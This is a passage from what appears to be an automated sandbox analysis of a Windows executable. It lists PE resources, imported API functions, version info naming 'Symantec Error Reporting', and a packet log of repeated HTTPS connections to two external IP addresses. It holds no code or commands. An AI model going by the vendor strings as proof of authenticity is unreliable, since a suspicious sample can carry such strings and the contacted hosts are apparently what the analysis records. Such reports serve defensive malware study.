                        RT_ICON | 0x1136b8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
                        RT_ICON | 0x1182e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
                        RT_ICON | 0x11c508 | 0x25a8 | data | English | United States
                        RT_ICON | 0x11eab0 | 0x10a8 | data | English | United States
                        RT_ICON | 0x11fb58 | 0xeb0 | data | English | United States
                        RT_ICON | 0x120a08 | 0x988 | data | English | United States
                        RT_ICON | 0x121390 | 0x6b8 | data | English | United States
                        RT_ICON | 0x121a48 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x121eb0 | 0x668 | data | English | United States
                        RT_ICON | 0x122518 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0x122800 | 0x1e8 | data | English | United States
                        RT_ICON | 0x1229e8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x122b10 | 0xea8 | data | English | United States
                        RT_ICON | 0x1239b8 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0x124260 | 0x6c8 | data | English | United States
                        RT_ICON | 0x124928 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x124e90 | 0x25a8 | data | English | United States
                        RT_ICON | 0x127438 | 0x10a8 | data | English | United States
                        RT_ICON | 0x1284e0 | 0x988 | data | English | United States
                        RT_ICON | 0x128e68 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x1292d0 | 0x668 | data | English | United States
                        RT_ICON | 0x129938 | 0x2e8 | data | English | United States
                        RT_ICON | 0x129c20 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x129d48 | 0xea8 | data | English | United States
                        RT_ICON | 0x12abf0 | 0x8a8 | data | English | United States
                        RT_ICON | 0x12b498 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x12ba00 | 0x452e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                        RT_ICON | 0x12ff30 | 0x25a8 | data | English | United States
                        RT_ICON | 0x1324d8 | 0x10a8 | data | English | United States
                        RT_ICON | 0x133580 | 0x988 | data | English | United States
                        RT_ICON | 0x133f08 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x134370 | 0x668 | data | English | United States
                        RT_ICON | 0x1349d8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0x134cc0 | 0x1e8 | data | English | United States
                        RT_ICON | 0x134ea8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x134fd0 | 0xea8 | data | English | United States
                        RT_ICON | 0x135e78 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0x136720 | 0x6c8 | data | English | United States
                        RT_ICON | 0x136de8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x137350 | 0x25a8 | data | English | United States
                        RT_ICON | 0x1398f8 | 0x10a8 | data | English | United States
                        RT_ICON | 0x13a9a0 | 0x988 | data | English | United States
                        RT_ICON | 0x13b328 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x13b790 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
                        RT_ICON | 0x14dbb8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
                        RT_ICON | 0x1527e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
                        RT_ICON | 0x156a08 | 0x25a8 | data | English | United States
                        RT_ICON | 0x158fb0 | 0x10a8 | data | English | United States
                        RT_ICON | 0x15a058 | 0xeb0 | data | English | United States
                        RT_ICON | 0x15af08 | 0x988 | data | English | United States
                        RT_ICON | 0x15b890 | 0x6b8 | data | English | United States
                        RT_ICON | 0x15bf48 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x15c3b0 | 0x668 | data | English | United States
                        RT_ICON | 0x15ca18 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0x15cd00 | 0x1e8 | data | English | United States
                        RT_ICON | 0x15cee8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x15d010 | 0xea8 | data | English | United States
                        RT_ICON | 0x15deb8 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0x15e760 | 0x6c8 | data | English | United States
                        RT_ICON | 0x15ee28 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x15f390 | 0x25a8 | data | English | United States
                        RT_ICON | 0x161938 | 0x10a8 | data | English | United States
                        RT_ICON | 0x1629e0 | 0x988 | data | English | United States
                        RT_ICON | 0x163368 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x1637d0 | 0x668 | data | English | United States
                        RT_ICON | 0x163e38 | 0x2e8 | data | English | United States
                        RT_ICON | 0x164120 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x164248 | 0xea8 | data | English | United States
                        RT_ICON | 0x1650f0 | 0x8a8 | data | English | United States
                        RT_ICON | 0x165998 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x165f00 | 0x452e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                        RT_ICON | 0x16a430 | 0x25a8 | data | English | United States
                        RT_ICON | 0x16c9d8 | 0x10a8 | data | English | United States
                        RT_ICON | 0x16da80 | 0x988 | data | English | United States
                        RT_ICON | 0x16e408 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x16e870 | 0x668 | data | English | United States
                        RT_ICON | 0x16eed8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0x16f1c0 | 0x1e8 | data | English | United States
                        RT_ICON | 0x16f3a8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x16f4d0 | 0xea8 | data | English | United States
                        RT_ICON | 0x170378 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0x170c20 | 0x6c8 | data | English | United States
                        RT_ICON | 0x1712e8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x171850 | 0x25a8 | data | English | United States
                        RT_ICON | 0x173df8 | 0x10a8 | data | English | United States
                        RT_ICON | 0x174ea0 | 0x988 | data | English | United States
                        RT_ICON | 0x175828 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x175c90 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
                        RT_ICON | 0x1880b8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
                        RT_ICON | 0x18cce0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
                        RT_ICON | 0x190f08 | 0x25a8 | data | English | United States
                        RT_ICON | 0x1934b0 | 0x10a8 | data | English | United States
                        RT_ICON | 0x194558 | 0xeb0 | data | English | United States
                        RT_ICON | 0x195408 | 0x988 | data | English | United States
                        RT_ICON | 0x195d90 | 0x6b8 | data | English | United States
                        RT_ICON | 0x196448 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x1968b0 | 0x668 | data | English | United States
                        RT_ICON | 0x196f18 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
                        RT_ICON | 0x197200 | 0x1e8 | data | English | United States
                        RT_ICON | 0x1973e8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x197510 | 0xea8 | data | English | United States
                        RT_ICON | 0x1983b8 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0x198c60 | 0x6c8 | data | English | United States
                        RT_ICON | 0x199328 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x199890 | 0x25a8 | data | English | United States
                        RT_ICON | 0x19be38 | 0x10a8 | data | English | United States
                        RT_ICON | 0x19cee0 | 0x988 | data | English | United States
                        RT_ICON | 0x19d868 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x19dcd0 | 0x668 | data | English | United States
                        RT_ICON | 0x19e338 | 0x2e8 | data | English | United States
                        RT_ICON | 0x19e620 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x19e748 | 0xea8 | data | English | United States
                        RT_ICON | 0x19f5f0 | 0x8a8 | data | English | United States
                        RT_ICON | 0x19fe98 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_ICON | 0x1a0400 | 0x452e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                        RT_ICON | 0x1a4930 | 0x25a8 | data | English | United States
                        RT_ICON | 0x1a6ed8 | 0x10a8 | data | English | United States
                        RT_ICON | 0x1a7f80 | 0x988 | data | English | United States
                        RT_ICON | 0x1a8908 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_GROUP_ICON | 0x1a8d70 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a8e20 | 0x84 | data | English | United States
                        RT_GROUP_ICON | 0x1a8ea4 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a8f54 | 0xa0 | data | English | United States
                        RT_GROUP_ICON | 0x1a8ff4 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a90a4 | 0x84 | data | English | United States
                        RT_GROUP_ICON | 0x1a9128 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a91d8 | 0xa0 | data | English | United States
                        RT_GROUP_ICON | 0x1a9278 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a9328 | 0x84 | data | English | United States
                        RT_GROUP_ICON | 0x1a93ac | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a945c | 0xa0 | data | English | United States
                        RT_GROUP_ICON | 0x1a94fc | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a95ac | 0x84 | data | English | United States
                        RT_GROUP_ICON | 0x1a9630 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a96e0 | 0xa0 | data | English | United States
                        RT_GROUP_ICON | 0x1a9780 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a9830 | 0x84 | data | English | United States
                        RT_GROUP_ICON | 0x1a98b4 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a9964 | 0xa0 | data | English | United States
                        RT_GROUP_ICON | 0x1a9a04 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a9ab4 | 0x84 | data | English | United States
                        RT_GROUP_ICON | 0x1a9b38 | 0xae | data | English | United States
                        RT_GROUP_ICON | 0x1a9be8 | 0xa0 | data | English | United States
                        RT_VERSION | 0x1a9c88 | 0x340 | data | English | United States
                        RT_VERSION | 0x1a9fc8 | 0x2f8 | data | English | United States
                        RT_VERSION | 0x1aa2c0 | 0x344 | data | English | United States
                        RT_VERSION | 0x1aa604 | 0x318 | data | English | United States
                        RT_VERSION | 0x1aa91c | 0x340 | data | English | United States
                        RT_VERSION | 0x1aac5c | 0x2f8 | data | English | United States
                        RT_VERSION | 0x1aaf54 | 0x344 | data | English | United States
                        RT_VERSION | 0x1ab298 | 0x318 | data | English | United States
                        RT_VERSION | 0x1ab5b0 | 0x340 | data | English | United States
                        RT_VERSION | 0x1ab8f0 | 0x2f8 | data | English | United States
                        RT_VERSION | 0x1abbe8 | 0x344 | data | English | United States
                        RT_VERSION | 0x1abf2c | 0x318 | data | English | United States
                        RT_VERSION | 0x1ac244 | 0x340 | data | English | United States
                        RT_VERSION0x1ac5840x2f8dataEnglishUnited States
                        RT_VERSION0x1ac87c0x344dataEnglishUnited States
                        RT_VERSION0x1acbc00x318dataEnglishUnited States
                        RT_VERSION0x1aced80x340dataEnglishUnited States
                        RT_VERSION0x1ad2180x2f8dataEnglishUnited States
                        RT_VERSION0x1ad5100x344dataEnglishUnited States
                        RT_VERSION0x1ad8540x318dataEnglishUnited States
                        RT_VERSION0x1adb6c0x340dataEnglishUnited States
                        RT_VERSION0x1adeac0x2f8dataEnglishUnited States
                        RT_VERSION0x1ae1a40x344dataEnglishUnited States
                        RT_VERSION0x1ae4e80x318dataEnglishUnited States
                        RT_MANIFEST0x1ae8000x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1aef800x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1af1c80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1af5940x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1afd7c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b04fc0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b07440x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b0b100x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b12f80x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b1a780x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b1cc00x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b208c0x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b28740x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b2ff40x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b323c0x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b36080x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b3df00x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b45700x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b47b80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b4b840x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b536c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b5aec0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b5d340x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b61000x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                        Imports

                        DLL | Import
                        advapi32.dll | RegDeleteKeyA, RegCreateKeyExA, RegQueryValueExA, RegCloseKey, RegEnumValueA, RegSetValueExA, RegDeleteValueA, RegEnumKeyA, RegOpenKeyExA
                        comctl32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
                        gdi32.dll | GetDeviceCaps, SetBkColor, CreateBrushIndirect, CreateFontIndirectA, SetTextColor, SetBkMode, SelectObject, DeleteObject
                        kernel32.dll | GetCommandLineA, CreateThread, LoadLibraryExA, GetFullPathNameA, SetFileAttributesA, GlobalUnlock, WaitForSingleObject, GetTempPathA, GlobalAlloc, GetTempFileNameA, VirtualProtect, GetFileAttributesA, GetProcAddress, GetSystemDirectoryA, Sleep, SearchPathA, GlobalLock, GetPrivateProfileStringA, GetDiskFreeSpaceA, GetCurrentDirectoryA, MultiByteToWideChar, MulDiv, FindClose, lstrcpynA, GetVersion, MoveFileA, SetErrorMode, GetCurrentProcess, FindFirstFileA, GetShortPathNameA, ExpandEnvironmentStringsA, SetFilePointer, GetFileSize, lstrcmpiA, FreeLibrary, GetTickCount, RemoveDirectoryA, ReadFile, CreateDirectoryA, ExitProcess, FindNextFileA, SetCurrentDirectoryA, LoadLibraryA, SetFileTime, CreateFileA, lstrlenA, lstrcmpA, GetModuleHandleA, GetModuleFileNameA, DeleteFileA, WriteFile, CloseHandle, CompareFileTime, lstrcatA, GlobalFree, GetWindowsDirectoryA, WritePrivateProfileStringA, CopyFileA, CreateProcessA, GetExitCodeProcess, GetLastError
                        ole32.dll | CoTaskMemFree, OleInitialize, CoCreateInstance, OleUninitialize
                        shell32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHGetSpecialFolderLocation, ShellExecuteA, SHFileOperationA
                        user32.dll | IsWindowVisible, DispatchMessageA, SendMessageTimeoutA, CreateWindowExA, GetClientRect, SetWindowPos, SystemParametersInfoA, LoadBitmapA, CharPrevA, EndPaint, DestroyWindow, EnableMenuItem, AppendMenuA, ShowWindow, SetWindowLongA, InvalidateRect, EnableWindow, OpenClipboard, EmptyClipboard, GetMessagePos, SendMessageA, ExitWindowsEx, IsWindowEnabled, BeginPaint, GetSysColor, PostQuitMessage, GetSystemMetrics, MessageBoxIndirectA, SetDlgItemTextA, EndDialog, SetClassLongA, GetDC, DefWindowProcA, CloseClipboard, GetDlgItemTextA, SetForegroundWindow, FillRect, LoadCursorA, CharNextA, IsWindow, GetSystemMenu, CreateDialogParamA, GetWindowRect, RegisterClassA, GetWindowLongA, DrawTextA, FindWindowExA, CheckDlgButton, TrackPopupMenu, wsprintfA, DialogBoxParamA, CreatePopupMenu, SetCursor, SetWindowTextA, ScreenToClient, LoadImageA, SetClipboardData

                        Exports

                        Name | Ordinal | Address
                        DllRegisterServer | 1 | 0x1002513f

                        Version Infos

                        Description | Data
                        LegalCopyright | Copyright 2016 Symantec Corporation. All rights reserved.
                        InternalName | SymErr
                        FileVersion | 7.6.2.5
                        CompanyName | Symantec Corporation
                        ProductName | Symantec Shared Component
                        ProductVersion | 7.6
                        FileDescription | Symantec Error Reporting
                        OriginalFilename | SymErr.exe
                        Translation | 0x0409 0x04b0

                        Possible Origin

                        Language of compilation system | Country where language is spoken | Map
                        English | United States |

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Dec 14, 2021 10:33:56.169133902 CET | 49772 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.169179916 CET | 443 | 49772 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.169270992 CET | 49772 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.170115948 CET | 49772 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.170137882 CET | 443 | 49772 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.320444107 CET | 443 | 49772 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.323769093 CET | 49773 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.323807001 CET | 443 | 49773 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.323893070 CET | 49773 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.325078011 CET | 49773 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.325093985 CET | 443 | 49773 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.384921074 CET | 49774 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.384965897 CET | 443 | 49774 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.385071993 CET | 49774 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.385968924 CET | 49774 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.385997057 CET | 443 | 49774 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.445888996 CET | 49775 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.445933104 CET | 443 | 49775 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.446013927 CET | 49775 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.446840048 CET | 49775 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.446865082 CET | 443 | 49775 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.475581884 CET | 443 | 49773 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.477123976 CET | 49776 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.477180004 CET | 443 | 49776 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.477348089 CET | 49776 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.478054047 CET | 49776 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.478080034 CET | 443 | 49776 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.536524057 CET | 443 | 49774 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.538096905 CET | 49777 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.538141012 CET | 443 | 49777 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.538228035 CET | 49777 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.539164066 CET | 49777 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.539185047 CET | 443 | 49777 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.597301960 CET | 443 | 49775 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.599082947 CET | 49778 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.599128008 CET | 443 | 49778 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.599239111 CET | 49778 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.600239038 CET | 49778 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.600253105 CET | 443 | 49778 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.628398895 CET | 443 | 49776 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.629982948 CET | 49779 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.630032063 CET | 443 | 49779 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.630146980 CET | 49779 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.630968094 CET | 49779 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.630990982 CET | 443 | 49779 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.689443111 CET | 443 | 49777 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.691081047 CET | 49780 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.691126108 CET | 443 | 49780 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.691215992 CET | 49780 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.692574978 CET | 49780 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.692596912 CET | 443 | 49780 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.750622034 CET | 443 | 49778 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.752547979 CET | 49781 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.752585888 CET | 443 | 49781 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.752688885 CET | 49781 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.753557920 CET | 49781 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.753567934 CET | 443 | 49781 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.755451918 CET | 49782 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.755487919 CET | 443 | 49782 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.755567074 CET | 49782 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.756136894 CET | 49782 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.756164074 CET | 443 | 49782 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.781342030 CET | 443 | 49779 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.843327045 CET | 443 | 49780 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.845531940 CET | 49783 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.845575094 CET | 443 | 49783 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.845649958 CET | 49783 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.846473932 CET | 49783 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.846491098 CET | 443 | 49783 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.903898001 CET | 443 | 49781 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.905615091 CET | 49784 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.905653000 CET | 443 | 49784 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.905747890 CET | 49784 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.906493902 CET | 443 | 49782 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.906672955 CET | 49784 | 443 | 192.168.2.5 | 3.12.124.139
                        Dec 14, 2021 10:33:56.906692982 CET | 443 | 49784 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:56.908546925 CET | 49785 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.908580065 CET | 443 | 49785 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.908668995 CET | 49785 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.909574032 CET | 49785 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:56.909584999 CET | 443 | 49785 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:56.996841908 CET | 443 | 49783 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:57.057349920 CET | 443 | 49784 | 3.12.124.139 | 192.168.2.5
                        Dec 14, 2021 10:33:57.060131073 CET | 443 | 49785 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:57.065263033 CET | 49786 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:57.065311909 CET | 443 | 49786 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:57.065414906 CET | 49786 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:57.066065073 CET | 49786 | 443 | 192.168.2.5 | 18.219.227.107
                        Dec 14, 2021 10:33:57.066081047 CET | 443 | 49786 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:57.216689110 CET | 443 | 49786 | 18.219.227.107 | 192.168.2.5
                        Dec 14, 2021 10:33:57.226584911 CET | 49787 | 443 | 192.168.2.5 | 18.219.227.107
